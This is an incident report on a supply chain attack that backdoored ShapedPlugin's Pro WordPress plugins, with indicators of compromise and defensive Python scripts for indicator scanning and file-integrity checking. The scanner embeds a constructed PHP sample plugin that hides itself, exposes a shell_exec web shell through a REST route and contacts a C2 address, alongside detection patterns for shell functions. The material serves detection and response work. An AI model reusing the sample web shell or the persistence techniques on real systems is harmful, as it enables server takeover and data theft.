Full Report
Multiple WordPress plugins from ShapedPlugin were compromised in a supply chain attack after unknown threat actors managed to tamper with the official release channels and push backdoor code. "Attackers compromised the vendor's build and distribution pipeline, injecting backdoor code into Pro plugin releases distributed through official licensed update channels," Wordfence said in an analysis
Analysis Summary
# Incident Report: ShapedPlugin Software Supply Chain Compromise
## Executive Summary
Multiple premium (Pro) WordPress plugins from vendor ShapedPlugin were trojanised in a supply chain attack on the vendor's build and distribution pipeline. The backdoored releases reached customers through the vendor's own licensed update channel and gave the attackers credential theft (including 2FA codes captured at login), a web shell on the host, and with it full server takeover. The incident shows how a trusted, authenticated update channel can be turned into a malware distribution mechanism without any vulnerability in the victim sites themselves.
## Incident Details
- **Discovery Date:** June 2026 (Reported June 22, 2026)
- **Incident Date:** June 2026
- **Affected Organization:** ShapedPlugin
- **Sector:** Software Development / WordPress Ecosystem
- **Geography:** Global (Affected any licensed user of the Pro plugins)
## Timeline of Events
### Initial Access
- **Date/Time:** Preceding June 22, 2026
- **Vector:** Build and Distribution Pipeline Compromise
- **Details:** Unknown threat actors gained access to the vendor's Easy Digital Downloads (EDD) licensing and download infrastructure (account.shapedplugin[.]com), from which licensed customers receive Pro plugin updates, and replaced the Pro plugin builds served there with backdoored versions.
### Lateral Movement
- **Details:** Once a backdoored release was installed on a victim site, the malware registered a custom REST endpoint and dropped a command-execution web shell, letting the attackers step from the WordPress application into the underlying server (OS-level command execution as the web server user).
### Data Exfiltration/Impact
- **Details:** The malware read `wp-config.php` (database credentials and salts), enumerated administrator accounts, harvested SMTP credentials stored by popular mail plugins, and collected the last three months of WooCommerce order data, including payment method details.
### Detection & Response
- **Detection:** Discovered by security researchers at Wordfence.
- **Response:** ShapedPlugin confirmed the incident, began a review of distribution processes, and prepared updated, clean versions of the software.
## Attack Methodology
- **Initial Access:** Supply Chain Attack (Build pipeline poisoning).
- **Persistence:** Implementation of a "fake plugin" that registers a custom REST endpoint and drops a command-execution web shell.
- **Privilege Escalation:** Not required. Plugin code already runs as the web server user, and the loader fires on admin page loads, so it executes inside an authenticated administrator session.
- **Defense Evasion:** The malware hides itself from the WordPress admin plugin list, uses a remote loader to fetch payloads at runtime rather than shipping them in the plugin, and deletes the extraction script (`install-persistent.php`) after execution to remove traces.
- **Credential Access:** Captures plaintext credentials and 2FA codes during user login. Steals SMTP and database credentials from configuration files.
- **Discovery:** Scans for installed mail plugins and WooCommerce data.
- **Lateral Movement:** The web shell provides command execution on the host, from which other sites or services on the same server can be reached.
- **Exfiltration:** Reports victim domains and stolen sensitive configuration data back to the C2 server.
- **Impact:** Full site compromise and data theft (PII and financial metadata).
## Impact Assessment
- **Financial:** High potential loss due to the theft of WooCommerce order data and payment method details.
- **Data Breach:** Exposure of database credentials, SMTP credentials, and customer order history.
- **Operational:** Significant disruption for site owners, who must clean the site manually, rotate every exposed credential, and reset user passwords.
- **Reputational:** Significant damage to ShapedPlugin's brand trust as a "Pro" software provider.
## Indicators of Compromise
- **Network Indicators:**
- `194.76.217[.]28:2871` (C2 / Payload delivery)
- `account.shapedplugin[.]com` (Source of compromised builds)
- **File Indicators:**
- `install-persistent.php` (temporary extraction script; it deletes itself after running, so its absence does not mean a site is clean)
- Unexplained "fake" plugins not visible in the standard admin UI.
- **Behavioral Indicators:** Outbound connections from WordPress servers to unrecognized IP addresses; requests to custom REST API routes that no known plugin registers; plugin directories on disk that do not appear in the admin plugin list.
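One way to hunt for the file and behavioral indicators above is to walk `wp-content/plugins` and flag files that carry the reported C2 address, the dropper's filename, or the described behaviour (filtering the admin plugin list to hide themselves, registering a REST route in the same file that calls a shell function). The script below is an added example, not Wordfence's or ShapedPlugin's code; the regular expressions are this example's own heuristics, not published signatures, and the two sample plugins it writes to a temporary directory are constructed for the demonstration.

```python
"""Heuristic scan of a WordPress plugins directory for the indicators in the report."""
from __future__ import annotations

import re
import tempfile
from pathlib import Path

# Indicators taken from the report.
C2_HOST = "194.76.217.28"
C2_PORT = "2871"
DROPPER_NAME = "install-persistent.php"

# Heuristics (assumptions, not published signatures): a plugin that filters
# 'all_plugins' can hide itself from the admin list; a file that both registers
# a REST route and calls a shell function looks like a command-execution endpoint.
HIDE_PATTERN = re.compile(r"add_filter\(\s*['\"]all_plugins['\"]")
REST_PATTERN = re.compile(r"register_rest_route\s*\(")
EXEC_PATTERN = re.compile(r"\b(shell_exec|exec|system|passthru|proc_open|popen)\s*\(")
C2_PATTERN = re.compile(re.escape(C2_HOST) + r"(?::" + C2_PORT + r")?")


def scan_file(path: Path) -> list[str]:
    """Return the list of indicator names that match one PHP file."""
    findings = []
    if path.name == DROPPER_NAME:
        findings.append("dropper-filename")
    try:
        text = path.read_text(errors="replace")
    except OSError:
        return findings
    if C2_PATTERN.search(text):
        findings.append("c2-address")
    if HIDE_PATTERN.search(text):
        findings.append("hides-from-plugin-list")
    if REST_PATTERN.search(text) and EXEC_PATTERN.search(text):
        findings.append("rest-route-with-command-exec")
    return findings


def scan_plugins(plugins_dir: Path) -> dict[str, list[str]]:
    """Map each suspicious PHP file (relative path) to its matching indicators."""
    results = {}
    for path in sorted(plugins_dir.rglob("*.php")):
        hits = scan_file(path)
        if hits:
            results[str(path.relative_to(plugins_dir))] = hits
    return results


# Constructed sample tree: one benign plugin and one plugin that mimics the
# reported behaviour (hidden from the list, REST route plus shell call, C2 address).
BENIGN = """<?php
/* Plugin Name: Hello Example */
add_action('init', function () { register_post_type('book', []); });
"""
FAKE = """<?php
/* Plugin Name: Core Helper */
add_filter('all_plugins', function ($plugins) {
    unset($plugins['core-helper/core-helper.php']);
    return $plugins;
});
add_action('rest_api_init', function () {
    register_rest_route('ch/v1', '/run', ['callback' => function ($req) {
        return shell_exec($req['cmd']);
    }]);
});
@file_get_contents('http://194.76.217.28:2871/p');
"""


def build_sample_tree() -> Path:
    """Write the constructed plugins into a fresh temporary directory."""
    root = Path(tempfile.mkdtemp()) / "plugins"
    (root / "hello-example").mkdir(parents=True)
    (root / "hello-example" / "hello-example.php").write_text(BENIGN)
    (root / "core-helper").mkdir()
    (root / "core-helper" / "core-helper.php").write_text(FAKE)
    (root / "core-helper" / "install-persistent.php").write_text("<?php // leftover\n")
    return root


if __name__ == "__main__":
    for rel, hits in scan_plugins(build_sample_tree()).items():
        print(f"{rel}: {', '.join(hits)}")
```

Run it against a real install with `scan_plugins(Path("/var/www/html/wp-content/plugins"))`; treat a hit on `hides-from-plugin-list` as a reason to inspect the plugin by hand, since a few legitimate management plugins filter the same list.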
## Response Actions
- **Containment:** ShapedPlugin began reviewing and securing the distribution pipeline.
- **Eradication:** Affected users must update to clean releases (for Product Slider Pro, versions above 3.5.4). Because the persistence mechanism is a separate, hidden fake plugin, replacing the Pro plugin files alone does not remove it; the dropped plugin and its web shell must be located and removed as well.
- **Recovery:** Site owners must reset all database and user passwords, and regenerate 2FA secrets.
## Lessons Learned
- **Supply Chain Vulnerability:** Vendors must protect their build and distribution environments with multi-factor authentication and integrity controls such as code signing, so that a compromised download server cannot silently substitute builds.
- **Update Trust:** Even official, licensed update channels can deliver malware; organizations should baseline their installs and watch for unexpected files, endpoints, and outbound connections after every update.
## Recommendations
- **For Vendors:** Audit the CI/CD pipeline and sign all distribution packages so that customers can detect tampering after the build.
- **For Site Owners:** Monitor `wp-config.php` and the plugins directory for changes with File Integrity Monitoring (FIM), and restrict outgoing network connections from web servers to the known services they need.
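A minimal version of the FIM recommendation, as an added example rather than any product's code: hash `wp-config.php` and every plugin PHP file after a known-clean install, store the digests, and compare after each update so that a modified plugin file or a newly dropped loader stands out. The WordPress tree it creates in a temporary directory and the simulated malicious update are constructed for the demonstration.

```python
"""Baseline-and-verify file integrity check for a WordPress install."""
from __future__ import annotations

import hashlib
import tempfile
from pathlib import Path

# Files worth baselining per the report: the config holding DB credentials and
# everything under the plugins directory, where the fake plugin is dropped.
WATCH_PATTERNS = ("wp-config.php", "wp-content/plugins/**/*.php")


def sha256_of(path: Path) -> str:
    """Stream a file through SHA-256 so large files do not have to fit in memory."""
    h = hashlib.sha256()
    with path.open("rb") as f:
        for chunk in iter(lambda: f.read(65536), b""):
            h.update(chunk)
    return h.hexdigest()


def baseline(root: Path) -> dict[str, str]:
    """Return {relative path: sha256} for every watched file under root."""
    digests = {}
    for pattern in WATCH_PATTERNS:
        for path in sorted(root.glob(pattern)):
            if path.is_file():
                digests[str(path.relative_to(root))] = sha256_of(path)
    return digests


def verify(root: Path, known: dict[str, str]) -> dict[str, list[str]]:
    """Compare the current tree with a stored baseline; report added/removed/modified."""
    current = baseline(root)
    return {
        "added": sorted(set(current) - set(known)),
        "removed": sorted(set(known) - set(current)),
        "modified": sorted(p for p in known.keys() & current.keys() if known[p] != current[p]),
    }


def simulate_backdoored_update() -> dict[str, list[str]]:
    """Constructed scenario: baseline a clean install, then apply a tampered update."""
    root = Path(tempfile.mkdtemp())
    plugin = root / "wp-content" / "plugins" / "slider-pro"
    plugin.mkdir(parents=True)
    (root / "wp-config.php").write_text("<?php define('DB_PASSWORD', 'example');\n")
    (plugin / "slider-pro.php").write_text("<?php // clean release\n")
    known = baseline(root)  # store this somewhere the web server user cannot write

    # The tampered release edits the plugin's main file and drops a remote loader;
    # wp-config.php is read by the malware but not changed, so it must not be flagged.
    (plugin / "slider-pro.php").write_text("<?php // clean release\n@include 'loader.php';\n")
    (plugin / "loader.php").write_text("<?php // remote loader\n")
    return verify(root, known)


if __name__ == "__main__":
    for kind, paths in simulate_backdoored_update().items():
        print(f"{kind}: {paths}")
```

Keep the stored baseline outside the web root and refresh it only after a deliberate, verified update; a vendor update that legitimately changes files should produce exactly the set of modified paths you expect, and anything in `added` that the vendor did not ship deserves a look.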